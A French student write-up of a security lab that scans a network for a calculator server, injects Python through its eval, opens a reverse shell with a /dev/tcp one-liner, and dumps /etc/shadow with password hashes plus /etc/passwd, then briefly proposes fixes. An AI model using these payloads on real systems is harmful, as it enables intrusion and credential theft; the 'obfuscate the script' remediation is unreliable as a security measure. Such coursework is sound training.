# TP5 : Exploit, pwn, fix

## 1. Reconnaissance

🌞 **Déterminer**

- à quelle IP ce client essaie de se co quand on le lance

```
10.1.2.12
```

- à quel port il essaie de se co sur cette IP

```
13337
```

- vous **DEVEZ** trouver une autre méthode que la lecture du code pour obtenir ces infos

[Reconnaissance](Files/Déterminer.pcapng)

```
┌──(kali㉿kali)-[/var/log/bs_client]
└─$ sudo python client.py
ERROR 2023-11-30 05:15:24,822 Impossible de se connecter au serveur 10.1.2.12 sur le port 13337
```

🌞 **Scanner le réseau**

- trouvez une ou plusieurs machines qui héberge une app sur ce port
- votre scan `nmap` doit être le plus discret possible : il ne teste que ce port là, rien d'autres
- testez d'abord dans un réseau avec des VMs

```
┌──(kali㉿kali)-[~]
└─$ nmap -T2 -p 13337 10.1.2.12
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-30 05:22 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 5.51 seconds

```

🦈 **tp5_nmap.pcapng**

- capture Wireshark de votre `nmap`
- je ne veux voir que les trames envoyées/reçues par `nmap` dans la capture

[tp5_nmap.pcapng](Files/tp5_nmap.pcapng)

🌞 **Connectez-vous au serveur**

- éditer le code du client pour qu'il se connecte à la bonne IP et au bon port
- utilisez l'application !
- vous devez déterminer, si c'est pas déjà fait, à quoi sert l'application

```
┌──(kali㉿kali)-[~]
└─$ sudo nmap -n 10.33.64.0/20 -p13337 --open
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-30 06:17 EST
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.33.66.165
Host is up (0.027s latency).

PORT      STATE SERVICE
13337/tcp open  unknown

RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.33.70.40
Host is up (0.11s latency).

PORT      STATE SERVICE
13337/tcp open  unknown

Nmap scan report for 10.33.76.174
Host is up (0.0054s latency).

PORT      STATE SERVICE
13337/tcp open  unknown

Nmap scan report for 10.33.76.195
Host is up (0.034s latency).

PORT      STATE SERVICE
13337/tcp open  unknown

Nmap scan report for 10.33.76.217
Host is up (0.0063s latency).

PORT      STATE SERVICE
13337/tcp open  unknown

Nmap done: 4096 IP addresses (4073 hosts up) scanned in 267.50 seconds
```

```
┌──(kali㉿kali)-[/var/log/bs_client]
└─$ sudo python client.py
Veuillez saisir une opération arithmétique : 
```

## 2. Exploit

🌞 **Injecter du code serveur**

- démerdez-vous pour arriver à faire exécuter du code arbitraire au serveur
- tu sais comment te co au serveur, et tu sais que ce que tu lui envoies, il l'évalue
- vous pouvez normalement avoir une injection de code :
  - exécuter du code Python
  - et normalement, exécuter des commandes shell depuis cette injection Python

```
import socket
import sys
import re
import logging

# On définit la destination de la connexion
host = '10.33.70.40'  # IP du serveur
port = 50001              # Port choisir par le serveur

class CustomFormatter(logging.Formatter):

    red = "\x1b[31;20m"
    reset = "\x1b[0m"
    
    FORMATS = {
        logging.ERROR: red + "%(levelname)s %(asctime)s %(message)s" + reset,
    }

    def format(self, record):
        log_fmt = self.FORMATS.get(record.levelno) 
        formatter = logging.Formatter(log_fmt)
        return formatter.format(record)


try:
    # Create a custom logger
    logger = logging.getLogger("bs_server")
    logger.setLevel(logging.DEBUG)  # This needs to be DEBUG to capture all levels of logs

    # Create handlers
    c_handler = logging.StreamHandler()
    f_handler = logging.FileHandler('/var/log/bs_client/bs_client.log')
    c_handler.setLevel(logging.ERROR)  # Set to DEBUG to ensure all levels are logged to console
    f_handler.setLevel(logging.DEBUG)  # Set to DEBUG to ensure all levels are logged to file

    # Create formatters and add it to handlers
    formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
    c_handler.setFormatter(CustomFormatter())
    f_handler.setFormatter(formatter)

    # Add handlers to the logger
    logger.addHandler(c_handler)
    logger.addHandler(f_handler)
except Exception as e:
    print(f"Failed to configure logging: {e}")
    sys.exit(1)

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    logger.info("Connexion réussie à %s:%s", host, port)
    
    userMessage = input("Veuillez saisir une opération arithmétique : ")
    
    s.sendall(userMessage.encode("utf-8"))
    logger.info("Message envoyé au serveur %s : %s", host, userMessage)

    #pattern = r'^(-?\d{1,5})\s*([+*-])\s*(-?\d{1,5})$'
    
    #match= re.match(pattern, userMessage)
    #if match:
        #num1, operator, num2 = match.groups()
        #num1, num2 = int(num1), int(num2)

        # Vérifiez si les nombres sont dans la plage [-100000, 100000]
        #if -100000 <= num1 <= 100000 and -100000 <= num2 <= 100000:
            
        #else:
            #raise ValueError("l'opération autorisée n'accepte que des nombres entiers compris entre -100000 et +100000")
    #else:
        #raise ValueError("l'opération autorisée n'accepte que les signes suivants (-,+,*) et des nombres entiers compris entre -100000 et +100000")

        
    
    data = s.recv(1024)
    s.close()
    logger.info(f"Réponse reçue du serveur {host} : {repr(data)}")
    sys.exit(0)
   # Assurez-vous que le socket est fermé même en cas d'erreur
   
    
except socket.error as e :
    logger.error("Impossible de se connecter au serveur %s sur le port %s", host, port)
    s.close()
    sys.exit(1)
# Close the connection.

print(socket.gethostbyname(socket.gethostname()))

```

```
┌──(kali㉿kali)-[/var/log/bs_client]
└─$ sudo python client.py
Veuillez saisir une opération arithmétique : __import__('os').system('ping -c 1 10.33.76.176')
```

[capture wireshark(preuve)](Files/exploit.pcapng)

## 3. Reverse shell

🌞 **Obtenez un reverse shell sur le serveur**

- si t'as injection de code, t'as sûrement possibilité de pop un reverse shell
- y'a plein d'exemple sur [le très bon hacktricks](https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux)

```
┌──(kali㉿kali)-[/var/log/bs_client]
└─$ sudo python client.py
Veuillez saisir une opération arithmétique : __import__('os').system('sh -i >& /dev/tcp/10.33.76.176/777 0>&1')
```

🌞 **Pwn**

- voler les fichiers `/etc/shadow` et `/etc/passwd`
- voler le code serveur de l'application
- déterminer si d'autres services sont disponibles sur la machine

```
cat /etc/shadow
root:$6$Ac2Zned208vSDVSn$wKuS7q/pIYPo90yin8zl6Ocxd/liQd4aCTnzQEwsTQ2feosGAovhMqxFR.oladVr3G8UbXf2/u.OzeDfWM4aq.::0:99999:7:::
bin:*:19469:0:99999:7:::
daemon:*:19469:0:99999:7:::
adm:*:19469:0:99999:7:::
lp:*:19469:0:99999:7:::
sync:*:19469:0:99999:7:::
shutdown:*:19469:0:99999:7:::
halt:*:19469:0:99999:7:::
mail:*:19469:0:99999:7:::
operator:*:19469:0:99999:7:::
games:*:19469:0:99999:7:::
ftp:*:19469:0:99999:7:::
nobody:*:19469:0:99999:7:::
systemd-coredump:!!:19621::::::
dbus:!!:19621::::::
tss:!!:19621::::::
sssd:!!:19621::::::
sshd:!!:19621::::::
systemd-oom:!*:19621::::::
it4:$6$bV62paDqH/ZQSVFb$jiBgcgpkuzmmoZSvvLPwpd4gjwvnKQEWTE119tMNTnICtMcJ6dyPcDCVaTur8j5UQFuxAAM6eTimGdr97Nagh1::0:99999:7:::
```

```
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
systemd-coredump:x:999:997:systemd Core Dumper:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
tss:x:59:59:Account used for TPM access:/dev/null:/sbin/nologin
sssd:x:998:995:User for sssd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/usr/share/empty.sshd:/sbin/nologin
systemd-oom:x:993:993:systemd Userspace OOM Killer:/:/usr/sbin/nologin
it4:x:1000:1000:it4:/home/it4:/bin/bash
```

```
ss -tupnl
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:PortProcess                             
tcp   LISTEN 2      1          10.0.3.15:13337      0.0.0.0:*    users:(("python3.9",pid=2312,fd=4))
tcp   LISTEN 0      128          0.0.0.0:22         0.0.0.0:*    users:(("sshd",pid=699,fd=3))      
tcp   LISTEN 0      128             [::]:22            [::]:*    users:(("sshd",pid=699,fd=4))
```

## 4. Bonus : DOS

Le DOS dans l'esprit, souvent c'est :

- d'abord t'es un moldu et tu trouves ça incroyable
- tu deviens un tech, tu te rends compte que c'est pas forcément si compliqué, ptet tu essaies
- tu deviens meilleur et tu te dis que c'est super lame, c'est nul techniquement, ça mène à rien, exploit c'est mieux
- tu deviens conscient, et ptet que parfois, des situations t'amèneront à trouver finalement le principe pas si inutile (politique ? militantisme ?)

## II. Remédiation

🌞 **Proposer une remédiation dév**

- le code serveur ne doit pas exécuter n'importe quoi
- il faut préserver la fonctionnalité de l'outil

```
- Ne pas utiliser la fonction eval()
- Obfusquer le script + build
```


🌞 **Proposer une remédiation système**

- l'environnement dans lequel tourne le service est foireux (le user utilisé ?)
- la machine devrait bloquer les connexions sortantes (pas de reverse shell possible)

```
- Mettre dans un contenaire
```
